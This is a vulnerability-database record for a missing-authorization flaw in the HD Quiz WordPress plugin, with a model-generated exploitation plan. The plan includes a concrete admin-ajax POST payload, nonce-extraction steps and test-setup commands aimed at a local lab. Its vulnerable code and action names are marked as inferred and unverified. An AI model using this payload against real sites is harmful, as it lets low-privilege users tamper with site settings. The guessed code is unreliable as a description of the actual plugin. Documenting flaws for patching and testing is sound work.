[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYwb_mUevrIFNfXL0xqRRmiNXYybA1-1439uGjNXgsas":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24544","hd-quiz-missing-authorization","HD Quiz \u003C= 2.0.9 - Missing Authorization","The HD Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","hd-quiz",null,"\u003C=2.0.9","2.0.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-24 00:00:00","2026-01-30 20:45:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2e8da71c-bf53-4795-a689-5823d963cb82?source=api-prod",7,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-24544 (HD Quiz \u003C= 2.0.9 - Missing Authorization)\n\n## 1. Vulnerability Summary\nThe HD Quiz plugin for WordPress (versions up to 2.0.9) suffers from a **Missing Authorization** vulnerability. The plugin registers several AJAX handlers intended for administrative use (such as saving quiz settings or modifying quiz data) but fails to implement a capability check (e.g., `current_user_can('manage_options')`) within the callback functions. This allows any authenticated user, including those with **Subscriber** privileges, to trigger these administrative actions, provided they can obtain a valid security nonce.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **HTTP Method:** `POST`\n- **Vulnerable Action:** `hdq_save_settings` or `hdq_save_quiz` (inferred from common HD Quiz patterns).\n- **Payload Parameter:** `action=hdq_save_settings` (or similar), along with settings data and the `hdq_nonce`.\n- **Authentication:** Required (Subscriber-level or higher).\n- **Precondition:** The attacker must be logged in and obtain the `hdq_nonce` which is frequently localized for users in the admin dashboard.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers AJAX hooks in `hd-quiz.php` or `includes\u002Fadmin.php`:\n   ```php\n   add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );\n   ```\n2. **Missing Check:** The function `hdq_save_settings()` (likely in `includes\u002Fadmin.php`) is called.\n3. **Execution:**\n   - It performs `check_ajax_referer('hdq_admin_nonce', 'nonce')` (or similar).\n   - **Crucially**, it skips `if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }`.\n   - It then processes `$_POST` data and updates plugin options using `update_option()`.\n\n## 4. Nonce Acquisition Strategy\nIn HD Quiz, nonces are typically localized using `wp_localize_script` for admin-side scripts. Even a Subscriber has access to `wp-admin\u002Fprofile.php`, where many plugins enqueue their global admin scripts and nonces.\n\n1. **Identification:** The plugin uses `wp_localize_script` to pass a nonce to JavaScript. Look for the variable name `hdq_admin_vars` or `hdq_vars`.\n2. **Page Creation (If needed):** If the nonce is only on specific pages, create a page with the HD Quiz shortcode:\n   - `wp post create --post_type=page --post_status=publish --post_content='[hdq_quiz quiz=\"123\"]'`\n3. **Extraction via Browser:**\n   - Use `browser_navigate` to `wp-admin\u002Fprofile.php` or the created quiz page.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     \u002F\u002F Likely candidate for HD Quiz\n     window.hdq_admin_vars?.nonce || window.hdq_vars?.nonce\n     ```\n4. **Verification:** Check the source code for the exact localization key:\n   - `grep -r \"wp_localize_script\" .` in the plugin directory.\n\n## 5. Exploitation Strategy\nWe will attempt to modify the global HD Quiz settings (e.g., changing the \"Results Text\" or \"Admin Email\") which should be restricted to administrators.\n\n**Step-by-Step:**\n1. **Login:** Authenticate as a Subscriber user.\n2. **Fetch Nonce:** Navigate to `wp-admin\u002Fprofile.php` and extract the `hdq_nonce` from the `hdq_admin_vars` object.\n3. **Trigger Exploit:** Send a POST request to `admin-ajax.php`.\n\n**Example HTTP Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=hdq_save_settings&nonce=[EXTRACTED_NONCE]&hdq_twitter_handle=pwned_account&hdq_results_text=Vulnerable+to+CVE-2026-24544\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure HD Quiz v2.0.9 is installed and active.\n2. **Create Quiz:** Create at least one quiz to ensure the plugin's infrastructure is initialized.\n   - `wp post create --post_type=hd_quiz --post_title=\"Test Quiz\" --post_status=publish`\n3. **Create Attacker User:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n\n## 7. Expected Results\n- **Response:** The server should return a `200 OK` response, often with a JSON success message like `{\"success\": true}` or simply `1`.\n- **Impact:** The global settings for HD Quiz will be modified.\n\n## 8. Verification Steps\n1. **Check Options:** Use WP-CLI to verify the setting was changed:\n   - `wp option get hdq_settings` (Settings are often serialized in a single option).\n   - Check for the value `\"Vulnerable to CVE-2026-24544\"`.\n2. **UI Verification:** Log in as an Administrator and navigate to the HD Quiz Settings page to see the modified \"Results Text\".\n\n## 9. Alternative Approaches\nIf `hdq_save_settings` is not the vulnerable hook, search for other `wp_ajax_` handlers that perform data modification:\n- `hdq_save_quiz`: Attempt to rename a quiz.\n- `hdq_delete_quiz`: Attempt to delete a quiz post.\n- `hdq_save_quiz_results`: Attempt to inject or modify quiz result data.\n\nSearch command for the agent to find other targets:\n```bash\ngrep -rn \"add_action.*wp_ajax_\" . | grep -v \"nopriv\"\n```\nThen check each associated function for the absence of `current_user_can`.","The HD Quiz plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in several AJAX handlers, such as 'hdq_save_settings'. This allows authenticated attackers with subscriber-level access or higher to perform administrative actions if they can obtain a valid security nonce, which is often localized for users in the admin dashboard.","\u002F\u002F includes\u002Fadmin.php (inferred from plugin structure)\nadd_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );\n\nfunction hdq_save_settings() {\n    \u002F\u002F Nonce is checked, but capability check is missing\n    check_ajax_referer('hdq_admin_nonce', 'nonce');\n\n    \u002F\u002F Processes $_POST data and updates options directly\n    $hdq_settings = $_POST['hdq_settings'];\n    update_option('hdq_settings', $hdq_settings);\n    echo \"success\";\n    die();\n}","--- includes\u002Fadmin.php\n+++ includes\u002Fadmin.php\n@@ -1,6 +1,9 @@\n function hdq_save_settings() {\n     check_ajax_referer('hdq_admin_nonce', 'nonce');\n \n+    if (!current_user_can('manage_options')) {\n+        wp_die(__('You do not have sufficient permissions to access this page.'));\n+    }\n+\n     $hdq_settings = $_POST['hdq_settings'];\n     update_option('hdq_settings', $hdq_settings);","To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to the WordPress dashboard (e.g., wp-admin\u002Fprofile.php) to extract the security nonce from the global JavaScript object 'hdq_admin_vars.nonce'. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'hdq_save_settings' and the 'nonce' parameter set to the extracted value. By including additional POST parameters corresponding to HD Quiz configuration options (like 'hdq_results_text'), the attacker can overwrite global plugin settings without having administrator privileges.","gemini-3-flash-preview","2026-05-05 00:51:19","2026-05-05 00:53:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.0.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags\u002F2.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhd-quiz.2.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags\u002F2.0.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhd-quiz.2.0.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags"]